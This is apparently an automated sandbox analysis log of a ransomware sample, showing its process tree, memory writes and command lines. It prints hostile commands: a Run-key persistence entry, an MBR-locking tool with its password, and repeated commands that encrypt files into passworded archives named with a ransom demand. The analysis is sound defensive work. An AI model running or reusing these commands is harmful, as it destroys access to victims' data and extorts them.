PID 1480 wrote to memory of 4384	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	113
PID 1480 wrote to memory of 4384	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	113
PID 1480 wrote to memory of 4652	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	115
PID 1480 wrote to memory of 4652	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	115
PID 1480 wrote to memory of 4652	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	115
PID 1480 wrote to memory of 6056	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	117
PID 1480 wrote to memory of 6056	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	117
PID 1480 wrote to memory of 6056	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	117
PID 1480 wrote to memory of 4376	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	118
PID 1480 wrote to memory of 4376	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	118
PID 1480 wrote to memory of 4376	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	118
PID 1480 wrote to memory of 5904	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	119
PID 1480 wrote to memory of 5904	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	119
PID 1480 wrote to memory of 5904	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	119
PID 1480 wrote to memory of 5304	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	123
PID 1480 wrote to memory of 5304	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	123
PID 1480 wrote to memory of 5304	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	123
PID 1480 wrote to memory of 6120	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	125
PID 1480 wrote to memory of 6120	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	125
PID 1480 wrote to memory of 6120	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	125
PID 1480 wrote to memory of 2356	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	127
PID 1480 wrote to memory of 2356	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	127
PID 1480 wrote to memory of 2356	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	127
PID 1480 wrote to memory of 636	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	129
PID 1480 wrote to memory of 636	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	129
PID 1480 wrote to memory of 636	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	129
PID 1480 wrote to memory of 5052	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	131
PID 1480 wrote to memory of 5052	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	131
PID 1480 wrote to memory of 5052	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	131
PID 1480 wrote to memory of 5376	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	133
PID 1480 wrote to memory of 5376	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	133
PID 1480 wrote to memory of 5376	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	133
PID 1480 wrote to memory of 5060	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	135
PID 1480 wrote to memory of 5060	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	135
PID 1480 wrote to memory of 5060	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	135
PID 1480 wrote to memory of 2432	1480	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe	137

C:\Users\Admin\AppData\Local\Temp\3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
"C:\Users\Admin\AppData\Local\Temp\3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe"
1⤵
- Checks computer location settings
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1480
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -i
  2⤵
  - Executes dropped EXE
  PID:5228
- C:\Windows\SysWOW64\nsf.exe
  "C:\Windows\system32\nsf.exe" /nobootpass /lock Yrs5S2z1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of SetWindowsHookEx
  PID:3460
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:3864
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1988
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4988
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1208
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1472
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2600
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:692
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4384
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4652
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -i
  2⤵
  - Executes dropped EXE
  PID:6056
- C:\Windows\SysWOW64\nsf.exe
  "C:\Windows\system32\nsf.exe" /nobootpass /lock Yrs5S2z1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of SetWindowsHookEx
  PID:4376
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:5904
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:5304
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:6120
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2356
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:636
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:5052
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:5376
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:5060
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2432
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:6024
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -s
  2⤵
  - Executes dropped EXE
  PID:5568
- C:\Windows\SysWOW64\PING.EXE
  "C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4452
- C:\Windows\SysWOW64\svschost.exe
  "C:\Windows\system32\svschost.exe" -s
  2⤵
  - Executes dropped EXE
  PID:5216

C:\Windows\SysWOW64\svschost.exe
C:\Windows\SysWOW64\svschost.exe
1⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in System32 directory
PID:4352
- C:\Windows\SysWOW64\REG.exe
  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /t REG_SZ /d "C:\scrlk\svchost.exe" /f
  2⤵
  - Adds Run key to start application
  PID:216
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\History.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\History.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\af.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\af.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:3008
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\an.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\an.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:5732
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ar.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ar.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:4556
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ast.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ast.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:4980
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\az.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\az.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:4836
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ba.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ba.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:4964
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\be.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\be.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:3648
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\bg.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\bg.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3832
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\bn.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\bn.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:5148
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\br.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\br.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1736
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ca.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ca.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:3324
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\co.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\co.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\cs.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\cs.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:6020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\cy.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\cy.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:5620
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\da.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\da.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2904
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\de.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\de.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1408
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\el.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\el.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:4488
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\eo.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\eo.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:5036
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\es.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\es.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:4272
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\et.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\et.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1776
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\eu.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\eu.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2208
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ext.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ext.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2324
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fa.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fa.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:3360
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fi.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fi.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fr.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fr.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:4396
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fur.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fur.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1504
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\fy.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\fy.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1880
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ga.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ga.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:5796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\gl.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\gl.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\gu.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\gu.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:532
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\he.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\he.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:396
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\hi.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\hi.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:1680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\hr.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\hr.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:3948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\hu.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\hu.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:696
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\hy.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\hy.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:3548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\id.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\id.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:5708
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\io.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\io.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:2140
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\is.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\is.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:720
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\it.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\it.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:5776
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\7-Zip\Lang\ja.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\7-Zip\Lang\ja.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Executes dropped EXE
  PID:3976
- C:\ProgramData\msvkp\svchost.exe
